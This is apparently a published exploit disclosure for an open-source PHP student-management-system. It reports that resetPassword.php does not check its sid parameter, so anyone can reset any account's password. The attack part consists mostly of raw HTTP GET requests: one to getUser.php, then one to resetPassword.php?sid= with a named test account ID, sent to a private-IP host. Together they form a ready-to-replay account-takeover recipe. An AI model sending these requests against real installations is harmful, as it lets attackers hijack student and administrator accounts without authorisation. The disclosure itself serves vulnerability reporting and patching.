Exploit Author: webraybtl@webray.com.cn inc
Vendor Homepage: https://github.com/ningzichun/student-management-system
The step of modifying the password was not verified, resulting in the ability to directly enter the website where the final password was modified, directly redirect to the page, and then enter a new password to reset the password, resulting in a everybody password reset student-management-system does not filter the content correctly at the "resetPassword.php" sid module, resulting in anyone password reset.
test account:201600012489
/resetPassword.php?sid=xxxx
- Open login.php source code.
2. request a getUser.php response.
GET /student/admin/fun/getUser.php HTTP/1.1
Host: 172.24.6.107:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: http://172.24.6.107:8081
Connection: close
Referer: http://172.24.6.107:8081/student/?retry=1
Cookie: PHPSESSID=
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
- request a resetPassword.php response.
GET /student/admin/fun/resetPassword.php?sid=201600012489 HTTP/1.1
Host: 172.24.6.107:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: http://172.24.6.107:8081
Connection: close
Referer: http://172.24.6.107:8081/student/?retry=1
Cookie: PHPSESSID=
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
- user login
